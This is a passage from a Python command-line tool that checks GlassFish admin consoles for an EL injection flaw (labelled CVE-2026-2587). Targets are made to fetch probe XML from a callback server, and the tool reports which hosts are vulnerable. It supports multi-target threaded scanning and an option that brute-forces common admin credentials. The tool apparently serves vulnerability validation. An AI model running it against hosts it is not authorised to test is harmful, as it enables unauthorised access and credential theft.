"brute_creds": r.get("brute_creds") or "",
"notes": r.get("error") or "",
}
for tc_name in TC_NAMES:
row[tc_name] = tc_map.get(tc_name, "SKIPPED")
rows.append(row)
return rows
def write_csv(results: list[dict], dest: str) -> None:
rows = results_to_csv_rows(results)
if dest == "-":
out = io.StringIO()
w = csv.DictWriter(out, fieldnames=CSV_FIELDS, lineterminator="\n")
w.writeheader()
w.writerows(rows)
print(out.getvalue())
else:
with open(dest, "w", newline="", encoding="utf-8") as f:
w = csv.DictWriter(f, fieldnames=CSV_FIELDS, lineterminator="\n")
w.writeheader()
w.writerows(rows)
print(_ok(f"CSV written → {dest}"))
# ══════════════════════════════════════════════════════════════════════════════
# CONSOLE PRINTER
# ══════════════════════════════════════════════════════════════════════════════
def print_result(r: dict, verbose: bool) -> None:
target = r["target"]
verdict = r["verdict"]
vuln = r["vulnerable_count"]
total = r["total_tests"]
print(f"\n{'─'*64}")
print(f" Target : {target}")
print(f" Server : {r.get('server_header','') or '(unknown)'}")
ver = r.get("detected_version", "")
ver_src = r.get("version_source", "")
aff = r.get("version_affected", "UNKNOWN")
if ver:
aff_label = (f"{G}YES{RESET}" if aff == "YES"
else f"{R}NO{RESET}" if aff == "NO"
else f"{Y}UNKNOWN{RESET}")
src_note = f" [{ver_src}]" if ver_src else ""
print(f" Version : {ver}{src_note} (affected: {aff_label})")
ac = r.get("admin_console", "unknown")
ge = r.get("gadget_endpoint", "unknown")
pr = r.get("proof", "not_attempted")
if ac != "unknown" or ge != "unknown":
print(f" Console : {ac} | Gadget: {ge} | Proof: {pr}")
if verdict in ("VULNERABLE", "VULNERABLE_UNAUTH"):
unauth_note = " (UNAUTHENTICATED)" if verdict == "VULNERABLE_UNAUTH" else ""
print(_ok(f"VULNERABLE{unauth_note} — {vuln}/{total} test cases confirmed"))
if r.get("brute_creds"):
print(_ok(f" Credentials : {r['brute_creds']}"))
for tc in r.get("tc_results", []):
if tc["status"] == "VULNERABLE":
print(_ok(f" {tc['name']} {tc['expr']} → {tc['expects']}"))
elif verdict == "NOT_VULNERABLE":
print(_fail(f"NOT VULNERABLE — 0/{total}"))
elif verdict == "AUTH_REQUIRED":
print(_warn(f"AUTH REQUIRED — {r.get('error','session rejected')}"))
else:
err = r.get("error", "")
print(_warn(f"{verdict}" + (f" — {err}" if err else "")))
if verbose:
for tc in r.get("tc_results", []):
sym = "[+]" if tc["status"] == "VULNERABLE" else "[-]" if tc["status"] == "NOT_VULNERABLE" else "[?]"
print(f" {sym} {tc['name']:30s} {tc['status']}")
if verdict in ("VULNERABLE", "VULNERABLE_UNAUTH"):
print()
print(_inf("Remediation: restrict admin access and apply vendor-published fixed builds when available."))
def print_summary(results: list[dict]) -> None:
total = len(results)
vuln = sum(1 for r in results if "VULNERABLE" in r["verdict"])
noauth = sum(1 for r in results if r["verdict"] == "AUTH_REQUIRED")
notvuln = sum(1 for r in results if r["verdict"] == "NOT_VULNERABLE")
errors = total - vuln - noauth - notvuln
print(f"\n{'═'*64}")
print(f" SCAN SUMMARY — {total} target(s)")
print(f"{'═'*64}")
print(f" {G}Vulnerable : {vuln}{RESET}")
print(f" Not vulnerable : {notvuln}")
print(f" Auth required : {noauth}")
print(f" Error / other : {errors}")
print(f"{'═'*64}")
# ══════════════════════════════════════════════════════════════════════════════
# ARGUMENT PARSER
# ══════════════════════════════════════════════════════════════════════════════
def build_parser() -> argparse.ArgumentParser:
p = argparse.ArgumentParser(
description="CVE-2026-2587 GlassFish EL injection — multi-target validator",
formatter_class=argparse.RawDescriptionHelpFormatter,
)
# Targets — one of --base or --targets-file required (not required when --generate-xml used)
tg = p.add_mutually_exclusive_group(required=False)
tg.add_argument("--base",
help="Single GlassFish admin URL e.g. https://localhost:4848")
tg.add_argument("--targets-file",
help="File with one target per line (URL [user] [pass])")
p.add_argument("--path", action="append",
help="Custom endpoint path (repeatable)")
# XML delivery
p.add_argument("--xml-url",
help="Pre-hosted static XML URL (VPS/interactsh)")
p.add_argument("--listen",
help="Serve XML locally e.g. 0.0.0.0:8000")
p.add_argument("--callback-url",
help="URL target fetches for XML e.g. http://host.docker.internal:8000")
# Canary customisation
p.add_argument("--prefix", help="Canary prefix e.g. CVE2587")
p.add_argument("--left", type=int, help="Left operand e.g. 7")
p.add_argument("--right", type=int, help="Right operand e.g. 7")
# Auth (global — overridden per-target by targets-file)
auth = p.add_mutually_exclusive_group()
auth.add_argument("--username", help="Admin username")
auth.add_argument("--brute", action="store_true",
help=f"Try {len(BRUTE_CREDS)} common GlassFish credential pairs "
"(mutually exclusive with --username/--cookie)")
p.add_argument("--password", help="Admin password (used with --username)")
p.add_argument("--cookie", help='Session cookie e.g. "JSESSIONID=abc123"')
# Network
p.add_argument("--header", action="append",
help='Extra header (repeatable) e.g. --header "X-Forwarded-For: 1.2.3.4"')
p.add_argument("--proxy", help="HTTP proxy e.g. http://127.0.0.1:8080")
p.add_argument("--timeout", type=int, default=15)
p.add_argument("--insecure", action="store_true")
p.add_argument("--threads", type=int, default=1,
help="Parallel scan threads for multi-target mode (default 1)")
# Output
p.add_argument("--json", action="store_true", help="JSON to stdout")
p.add_argument("--csv", metavar="FILE",
help="CSV report path (use - for stdout)")
p.add_argument("--verbose", action="store_true")
# Mode
p.add_argument("--check-unauth-only", action="store_true",
help="Only test unauthenticated access then exit")
# XML generation
p.add_argument("--generate-xml", metavar="FILE",
help="Generate a probe.xml and exit (use - for stdout) "
"e.g. --generate-xml probe.xml")
return p
# ══════════════════════════════════════════════════════════════════════════════
# MAIN
# ══════════════════════════════════════════════════════════════════════════════
def generate_xml(dest: str, prefix: str, left: int, right: int) -> None:
"""Write a ready-to-host probe XML to dest (or stdout if dest=='-')."""
canary = Canary(prefix=prefix, left=left, right=right)
content = canary.xml().decode()
if dest == "-":
print(content)
else:
with open(dest, "w", encoding="utf-8") as f:
f.write(content)
print(_ok(f"probe XML written → {dest}"))
print(_inf(f" Expression : {canary.expr}"))
print(_inf(f" Expects : {canary.title_eval} in response title"))
print(_inf(f" Host this file at a URL reachable by the target server."))
print(_inf(f" Then run:"))
print(_inf(f" --xml-url http://YOUR_SERVER/{dest}"))
print(_inf(f" --prefix {prefix} --left {left} --right {right}"))
def main(argv: Optional[list[str]] = None) -> int:
args = build_parser().parse_args(argv)
# ── --generate-xml: create probe file and exit, no target needed ─────────
if args.generate_xml:
prefix = args.prefix or "CVE2587"
left = args.left if args.left is not None else 7
right = args.right if args.right is not None else 7
if not re.fullmatch(r"[A-Za-z0-9_-]{3,80}", prefix):
print("--prefix: 3-80 alphanumeric/underscore/hyphen chars", file=sys.stderr)
return 2
generate_xml(args.generate_xml, prefix, left, right)
return 0
# target required for all other modes
if not args.base and not args.targets_file:
print("Provide --base or --targets-file (or use --generate-xml to create a probe XML)",
file=sys.stderr)
return 2
serve_mode = bool(args.listen)
static_mode = bool(args.xml_url)
if not serve_mode and not static_mode:
print("Provide --listen + --callback-url OR --xml-url", file=sys.stderr)
return 2
if serve_mode and not args.callback_url:
print("--listen requires --callback-url", file=sys.stderr)
return 2
verify = not args.insecure
if args.insecure:
warnings.simplefilter("ignore", InsecureRequestWarning)
# Build target list
if args.base:
targets = [Target(base=args.base)]
else:
targets = load_targets_file(args.targets_file)
if not targets:
print("[!] No targets found.", file=sys.stderr); return 2
# Build canary
prefix = args.prefix or (f"CVE20262587{random.randint(100000,999999)}"
if serve_mode else "CVE2587")
if not re.fullmatch(r"[A-Za-z0-9_-]{3,80}", prefix):
print("--prefix: 3-80 alphanumeric/underscore/hyphen chars", file=sys.stderr)
return 2
left = args.left if args.left is not None else (random.randint(13, 97) if serve_mode else 7)
right = args.right if args.right is not None else (random.randint(101,199) if serve_mode else 7)
canary = Canary(prefix=prefix, left=left, right=right)
# Build test cases
tag = random.randint(10000, 99999)
test_cases = build_test_cases(tag) if serve_mode else []
tc_built = []
for tc in test_cases:
xml_bytes, detect_token, raw_prefix = make_tc_xml(tc, tag)
tc_built.append((tc, xml_bytes, detect_token, raw_prefix))
# Normalise callback to scheme://host:port — strip any filename the user
# may have included (e.g. http://host:8000/cve.xml -> http://host:8000).
callback_warning = None
if args.callback_url:
cb_base, callback_warning = normalize_callback_base(args.callback_url)
else:
cb_base = ""
xml_url = (f"{cb_base}/canary.xml" if serve_mode else args.xml_url)
if not args.json:
print(f"\n{'═'*64}")
print(f" CVE-2026-2587 · GlassFish EL Injection Validator")
mode = f"{len(test_cases)} test cases" if serve_mode else "single canary"
print(f" Mode: {mode} · Targets: {len(targets)} · Threads: {args.threads}")
print(f"{'═'*64}")
print(_inf(f"Callback : {xml_url}"))
if callback_warning:
print(_warn(callback_warning))
if args.proxy: print(_inf(f"Proxy : {args.proxy}"))
print()
print_lock = threading.Lock()
@contextlib.contextmanager
def _maybe_serve():
if serve_mode:
with xml_server(args.listen, args.verbose):
_State.routes["/canary.xml"] = canary.xml()
_State.routes["/cve.xml"] = canary.xml()
for tc, xml_bytes, _, _ in tc_built:
_State.routes[tc.path] = xml_bytes
time.sleep(0.25)
yield
else:
yield
all_results = []
with _maybe_serve():
def _worker(t: Target) -> dict:
return scan_one(
target=t, args=args, verify=verify,
canary=canary, xml_url=xml_url, cb_base=cb_base,
test_cases=test_cases, tc_built=tc_built,
serve_mode=serve_mode, static_mode=static_mode,
verbose=args.verbose, print_lock=print_lock,
)
n_threads = max(1, min(args.threads, len(targets)))
if n_threads == 1:
for t in targets:
r = _worker(t)
all_results.append(r)
if not args.json:
print_result(r, args.verbose)
else:
future_map = {}
with ThreadPoolExecutor(max_workers=n_threads) as pool:
for t in targets:
future_map[pool.submit(_worker, t)] = t
for fut in as_completed(future_map):
r = fut.result()
all_results.append(r)
if not args.json:
print_result(r, args.verbose)
# ── Output ────────────────────────────────────────────────────────────────
if not args.json:
if len(all_results) > 1:
print_summary(all_results)
if args.json:
print(json.dumps(all_results if len(all_results) > 1
else all_results[0], indent=2, sort_keys=True))
if args.csv:
write_csv(all_results, args.csv)
# Exit code: 0 if any target vulnerable, 1 if none, 3 if auth issues
verdicts = {r["verdict"] for r in all_results}
if any("VULNERABLE" in v for v in verdicts): return 0
if verdicts == {"AUTH_REQUIRED"}: return 3
return 1
if __name__ == "__main__":
sys.exit(main())